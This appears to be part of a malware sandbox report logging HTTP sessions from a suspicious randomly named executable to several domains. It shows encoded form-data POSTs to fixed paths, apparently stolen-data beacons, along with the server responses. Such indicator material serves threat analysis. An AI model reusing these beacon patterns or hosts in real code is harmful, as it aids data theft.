                                                                                Dec 3, 2024 14:14:36.197098017 CET685INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:36 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Content-Encoding: br
                                                                                Data Raw: 31 62 62 0d 0a a1 38 1a 00 20 ff af a9 a7 2b 8f 2e 79 32 55 8c 68 b0 6b 9f 9a 5b a7 f2 c9 de 1d 38 27 ea 44 a7 1a d9 e0 9b 25 27 0e 78 c2 e5 51 37 fa 09 af 3a 87 a7 ff dc 04 ba 76 21 31 08 72 4a 02 53 9e f4 50 ab 34 c0 4f 2a 8e 67 98 14 95 5f f0 fe 02 a3 b2 29 6e 2c 94 2f fb 52 96 13 8c 9c 45 00 00 a7 bc fd fc 2e 20 0f 19 11 70 4e 44 87 06 41 ae 8c 4f 07 0e 4b 1a a8 4a 09 f9 87 b8 ef ff bb 48 3c f9 6d 40 0e 70 ad 80 fd fc a6 60 95 b5 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 b9 b5 d7 f3 79 b5 bb f4 e1 73 c3 3c f5 16 63 da b6 b2 68 37 e1 7d db 8b 76 18 12 1f da 40 a5 25 7c b6 bf 2f b1 c4 39 c6 24 bc 38 2e a0 41 a0 d2 61 97 b3 21 91 ff f1 f6 2a 0b d0 7f e0 76 aa 75 5d 19 90 a6 52 2a 82 c4 a4 99 4b 63 dd 30 50 6b 23 eb 04 13 5a c7 bc 36 59 9c 24 2e f2 de 67 a9 8b 8d 49 32 23 b5 89 74 a6 eb c4 b4 33 d9 40 ee b1 8e b4 aa a3 c4 81 8e 54 43 45 95 8c 33 a3 93 76 04 a0 53 c8 4c d2 e2 02 26 6e da e8 0a 60 ca e2 df df a5 5f 2c 2d 0e 91 86 04 76 fe fa fe 83 83 77 f3 dd 74 19 38 1a d1 8a d6 84 84 b8 40 cc fc [TRUNCATED]
                                                                                Data Ascii: 1bb8 +.y2Uhk[8'D%'xQ7:v!1rJSP4O*g_)n,/RE. pNDAOKJH<m@p`F~~n_{ys<ch7}v@%|/9$8.Aa!*vu]R*Kc0Pk#Z6Y$.gI2#t3@TCE3vSL&n`_,-vwt8@+bcqEqu5z|oV}&'"ngSV$e*\{^brh@/teGHSK$jWFHe T2-4JS*0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.549850185.27.134.206803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:37.686753988 CET1836OUTPOST /4d2l/ HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.canadavinreport.site
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.canadavinreport.site/4d2l/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 6e 38 31 5a 76 54 47 36 77 70 68 6c 50 46 57 51 6c 6d 42 72 75 54 70 78 2f 50 71 68 36 2f 6b 31 31 38 59 30 4c 66 32 50 70 4e 4d 5a 30 36 79 4f 4c 4f 62 55 64 63 74 58 39 63 4b 62 5a 32 37 48 72 38 64 63 4a 4c 2f 2b 39 70 33 31 33 6c 75 59 50 69 65 75 67 6a 69 69 33 75 6f 6f 63 49 70 48 46 41 55 79 55 64 64 59 4e 4d 54 69 62 49 71 4f 42 54 6c 61 67 32 50 6b 61 38 6a 59 79 74 61 52 46 32 37 68 6b 33 6b 31 69 33 6a 58 34 59 56 32 41 66 58 48 42 4e 68 77 4a 64 48 65 59 41 48 53 52 74 52 51 69 70 35 79 6e 54 67 69 67 6c 2b 63 61 5a 39 56 30 71 49 7a 6a 4e 77 76 5a 55 2f 74 39 6d 64 55 63 77 4d 48 6a 32 69 53 74 6c 73 6c 4d 6f 57 31 44 50 4f 4a 69 50 48 44 6e 6a 65 54 35 67 72 73 31 47 74 74 38 51 4a 33 73 51 2b 61 36 55 79 6d 56 4d 74 61 37 46 52 77 4f 7a 33 6c 44 61 38 67 4b 7a 57 42 70 33 74 6a 38 7a 58 46 52 54 39 55 6a 49 72 33 38 6c 46 6e 50 6f 5a 61 78 39 5a [TRUNCATED]
                                                                                Data Ascii: PLpD=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZn81ZvTG6wphlPFWQlmBruTpx/Pqh6/k118Y0Lf2PpNMZ06yOLObUdctX9cKbZ27Hr8dcJL/+9p313luYPieugjii3uoocIpHFAUyUddYNMTibIqOBTlag2Pka8jYytaRF27hk3k1i3jX4YV2AfXHBNhwJdHeYAHSRtRQip5ynTgigl+caZ9V0qIzjNwvZU/t9mdUcwMHj2iStlslMoW1DPOJiPHDnjeT5grs1Gtt8QJ3sQ+a6UymVMta7FRwOz3lDa8gKzWBp3tj8zXFRT9UjIr38lFnPoZax9ZRzRok0gIFjQbrJMCIYU4eD8OR0UTydfTL66wHjryRUMHhXhhkLpf/8cNnoq4NyqwFYcNKTFhShRuWPKj4amrxGMbVpVPJcL6aRt2DCns7ANK0MB07DefLjDkmFuHrLN+GiRdP9vNxQwcSPFM/yu1ugVSZcZUXZfCrbFgyJ+Bxiop+S+kUKyWS9WmTrPzR+xSo13SGNx5TdvslDhAWZqpaXj0Gi8xVjsLYJtn22csl96pnVAy3uoRe5Hwo9RzEkNyegFY1lgczPBVYp132BrwZu9/MbkZtfVfwS1Nui9nSQHC9/SfX9f93swrpEjiywiFhIT1LsVq6Zv7MK90GzBQ/BTKrKYqKjl4Qpo3ULA4SS9+Xayx7+ODDWCPcKgozLA92BYErjOhUOsy+oUot2mfv9GrKhV+bI1w7SP0poG8N0jq7OzJPgPaUmJadXE2xTrNjksQp0v5M0PUYC2tfGxiC/03GmOXtAx56ChArZTufI6vHTKPW+Vo640Wv3G64DtIrxLb8RR7+0YUHrBD9y1ej6rRdPlRbADY/qEHnhUbt5nmmny86uBjymbafnzL98S+HNEb6NAc69TWipB3caOSGG0YtILx2LHAsHbo7NzxCqwK8EGUJfOkojUi8wkaqr+ZjSE/nTEqTd11R74cDxemVyv7EeE0PYXrUw [TRUNCATED]
                                                                                Dec 3, 2024 14:14:38.897469997 CET685INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:38 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Content-Encoding: br
                                                                                Data Raw: 31 62 62 0d 0a a1 38 1a 00 20 ff af a9 a7 2b 8f 2e 79 32 55 8c 68 b0 6b 9f 9a 5b a7 f2 c9 de 1d 38 27 ea 44 a7 1a d9 e0 9b 25 27 0e 78 c2 e5 51 37 fa 09 af 3a 87 a7 ff dc 04 ba 76 21 31 08 72 4a 02 53 9e f4 50 ab 34 c0 4f 2a 8e 67 98 14 95 5f f0 fe 02 a3 b2 29 6e 2c 94 2f fb 52 96 13 8c 9c 45 00 00 a7 bc fd fc 2e 20 0f 19 11 70 4e 44 87 06 41 ae 8c 4f 07 0e 4b 1a a8 4a 09 f9 87 b8 ef ff bb 48 3c f9 6d 40 0e 70 ad 80 fd fc a6 60 95 b5 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 b9 b5 d7 f3 79 b5 bb f4 e1 73 c3 3c f5 16 63 da b6 b2 68 37 e1 7d db 8b 76 18 12 1f da 40 a5 25 7c b6 bf 2f b1 c4 39 c6 24 bc 38 2e a0 41 a0 d2 61 97 b3 21 91 ff f1 f6 2a 0b d0 7f e0 76 aa 75 5d 19 90 a6 52 2a 82 c4 a4 99 4b 63 dd 30 50 6b 23 eb 04 13 5a c7 bc 36 59 9c 24 2e f2 de 67 a9 8b 8d 49 32 23 b5 89 74 a6 eb c4 b4 33 d9 40 ee b1 8e b4 aa a3 c4 81 8e 54 43 45 95 8c 33 a3 93 76 04 a0 53 c8 4c d2 e2 02 26 6e da e8 0a 60 ca e2 df df a5 5f 2c 2d 0e 91 86 04 76 fe fa fe 83 83 77 f3 dd 74 19 38 1a d1 8a d6 84 84 b8 40 cc fc [TRUNCATED]
                                                                                Data Ascii: 1bb8 +.y2Uhk[8'D%'xQ7:v!1rJSP4O*g_)n,/RE. pNDAOKJH<m@p`F~~n_{ys<ch7}v@%|/9$8.Aa!*vu]R*Kc0Pk#Z6Y$.gI2#t3@TCE3vSL&n`_,-vwt8@+bcqEqu5z|oV}&'"ngSV$e*\{^brh@/teGHSK$jWFHe T2-4JS*0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.549856185.27.134.206803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:40.593611956 CET528OUTGET /4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.canadavinreport.site
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:14:41.763470888 CET1196INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:14:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 995
                                                                                Connection: close
                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5251b24cd521712a038954f2dd56d894");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEj&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.54987488.99.61.52803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:47.828804970 CET778OUTPOST /ogj2/ HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.phoenix88.sbs
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.phoenix88.sbs/ogj2/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 51 42 66 42 38 72 45 6b 4d 6f 31 55 50 31 79 33 75 46 5a 67 65 34 78 6c 49 50 70 59 43 35 38 38 76 6f 36 42 31 31 59 36 76 4f 51 43 6c 64 44 71 37 63 44 6f 74 62 63 62 68 33 71 4d 32 54 7a 62 34 4f 4e 34 37 56 49 38 51 38 6a 58 54 30 48 7a 49 48 44 78 4e 2b 6e 71 41 48 6c 7a 51 45 57 2b 52 42 71 79 6c 53 30 63 2b 45 48 78 44 46 57 52 49 6e 36 6e 4c 4f 38 65 44 74 77 46 4e 55 77 63 64 76 2b 52 53 48 6f 58 6f 4b 38 79 6d 61 73 42 48 2f 68 77 36 37 4f 2b 46 38 7a 34 35 34 41 7a 49 53 41 53 4c 4e 38 47 70 48 4e 6e 75 71 78 65 69 62 47 78 69 7a 31 47 74 6c 38 3d
                                                                                Data Ascii: PLpD=F/4Ipjr2NB0HQBfB8rEkMo1UP1y3uFZge4xlIPpYC588vo6B11Y6vOQCldDq7cDotbcbh3qM2Tzb4ON47VI8Q8jXT0HzIHDxN+nqAHlzQEW+RBqylS0c+EHxDFWRIn6nLO8eDtwFNUwcdv+RSHoXoK8ymasBH/hw67O+F8z454AzISASLN8GpHNnuqxeibGxiz1Gtl8=
                                                                                Dec 3, 2024 14:14:49.147865057 CET1020INHTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:48 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.54987988.99.61.52803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:50.492878914 CET798OUTPOST /ogj2/ HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.phoenix88.sbs
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.phoenix88.sbs/ogj2/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 43 30 50 42 2f 49 73 6b 4b 49 31 58 41 56 79 33 38 46 59 70 65 34 31 6c 49 4f 74 49 43 4b 59 38 76 4e 65 42 30 78 4d 36 6f 4f 51 43 77 74 44 76 6a 38 44 7a 74 62 59 54 68 33 57 4d 32 54 33 62 34 4c 78 34 6e 79 30 2f 51 73 6a 56 4e 55 48 78 58 58 44 78 4e 2b 6e 71 41 48 5a 56 51 45 4f 2b 52 78 61 79 6b 7a 30 62 33 6b 48 79 54 31 57 52 4d 6e 36 6a 4c 4f 39 4a 44 76 56 59 4e 53 38 63 64 75 4f 52 52 57 6f 55 68 4b 38 30 69 61 74 4e 42 50 6b 59 30 36 47 6e 42 64 57 2f 71 49 34 6f 45 45 78 34 52 76 30 75 36 6e 68 66 2b 35 35 70 7a 72 6e 59 34 51 6c 32 7a 79 6f 4a 58 66 74 37 77 2f 41 6d 71 5a 6c 6b 69 59 48 6f 33 58 59 41
                                                                                Data Ascii: PLpD=F/4Ipjr2NB0HC0PB/IskKI1XAVy38FYpe41lIOtICKY8vNeB0xM6oOQCwtDvj8DztbYTh3WM2T3b4Lx4ny0/QsjVNUHxXXDxN+nqAHZVQEO+Rxaykz0b3kHyT1WRMn6jLO9JDvVYNS8cduORRWoUhK80iatNBPkY06GnBdW/qI4oEEx4Rv0u6nhf+55pzrnY4Ql2zyoJXft7w/AmqZlkiYHo3XYA
                                                                                Dec 3, 2024 14:14:51.843071938 CET1020INHTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:51 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.54988588.99.61.52803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:14:53.165179968 CET1815OUTPOST /ogj2/ HTTP/1.1
                                                                                Host: www.phoenix88.sbs
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.phoenix88.sbs
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.phoenix88.sbs/ogj2/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 46 2f 34 49 70 6a 72 32 4e 42 30 48 43 30 50 42 2f 49 73 6b 4b 49 31 58 41 56 79 33 38 46 59 70 65 34 31 6c 49 4f 74 49 43 4b 51 38 73 2f 57 42 31 51 4d 36 70 4f 51 43 73 39 44 75 6a 38 43 68 74 62 67 58 68 33 62 35 32 52 2f 62 35 70 4a 34 72 54 30 2f 62 73 6a 56 46 30 48 79 49 48 44 6f 4e 36 4b 6a 41 42 35 56 51 45 4f 2b 52 33 57 79 6e 69 30 62 37 45 48 78 44 46 57 64 49 6e 36 4c 4c 4f 6b 38 44 76 51 76 4e 69 63 63 63 4f 65 52 65 45 77 55 67 71 38 32 73 36 73 51 42 4f 59 48 30 36 4b 72 42 64 79 5a 71 4c 6f 6f 48 51 67 64 4f 50 6b 34 6c 47 59 2b 73 72 46 5a 7a 62 32 35 34 44 42 53 75 69 30 30 62 38 77 56 6c 35 38 39 2b 59 30 51 35 73 62 37 2b 51 56 4b 59 7a 62 49 46 59 6d 38 79 54 64 5a 66 63 5a 62 49 64 6e 51 32 34 61 43 4f 6f 6f 74 62 64 62 31 37 4f 39 72 38 65 71 67 4e 33 76 52 65 6a 68 41 37 52 5a 2f 73 67 33 53 66 69 6e 7a 53 73 69 39 32 7a 31 46 79 78 38 2f 56 63 42 66 38 72 41 53 34 37 76 31 38 2b 4f 4c 5a 4c 31 71 70 6b 33 33 31 71 73 48 4f 45 67 42 39 44 67 67 39 56 70 63 75 [TRUNCATED]
                                                                                Data Ascii: PLpD=F/4Ipjr2NB0HC0PB/IskKI1XAVy38FYpe41lIOtICKQ8s/WB1QM6pOQCs9Duj8ChtbgXh3b52R/b5pJ4rT0/bsjVF0HyIHDoN6KjAB5VQEO+R3Wyni0b7EHxDFWdIn6LLOk8DvQvNicccOeReEwUgq82s6sQBOYH06KrBdyZqLooHQgdOPk4lGY+srFZzb254DBSui00b8wVl589+Y0Q5sb7+QVKYzbIFYm8yTdZfcZbIdnQ24aCOootbdb17O9r8eqgN3vRejhA7RZ/sg3SfinzSsi92z1Fyx8/VcBf8rAS47v18+OLZL1qpk331qsHOEgB9Dgg9VpcuHcLUERcmuEOKIEseQUP+/BEyqD/4GoI6JKr8nx+7v2HN5pvcY5jwL96PT25MjXYF7fF3ILGACFh3KlXy4TXjDxEHNidAbVqH/73X7Tpf+BxoO7KCwRCeJ0LmhZH3XidgyvOKoo9IOE4QpMuW7oVsT1qiCwltl+0uHMQB3mA8igrRWMrfslXBGqxobaD+jWdDvBpBrw1ShNLmuNuSX/bQ/GACo9uQSHNXM4X9Xgn0NJ0TUTqO01yjrZcAMyIj+NI+bhvBMXybT6JDZgwzG8tbHZkJq+AAgsfJJaLa32JyMZIL2S8XiSQlTlPE+A9JuzoTpsH+Cq9ZCwvh4SIYKzSM3o8/RzwRiqzjI+wZsioGaU9/ZDUcBOGPO0GEideRnuYsJhBoc/RJ8hQORsWHueXaGcgUkp01VFhA5u58zUHQmAN10IvAKDp2mJMZGFdndMvpXBdp/d+WT1z6SRoEvjW+yR2QzHVcQfjILTTHMVvv/QVIU4Eyznj0zY/mz2tazwbLgmZDtQJeBNVxc39WAMN7RxLGjV2T5Lg0d5m6UG0xyFdoojlqaeYxp4Yw4r4E3jOC4mlOyO1oG8jirY0FWT5sL5xlwaq8CuQeaMRJdTqHv3hDVETfDOZNRL0Oky44TMUfGFe8+SOXsc7Z4lGpJR1qnQy6B7jeFkIq0V [TRUNCATED]
                                                                                Dec 3, 2024 14:14:54.482547998 CET1020INHTTP/1.1 302 Found
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 771
                                                                                date: Tue, 03 Dec 2024 13:14:54 GMT
                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                location: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi
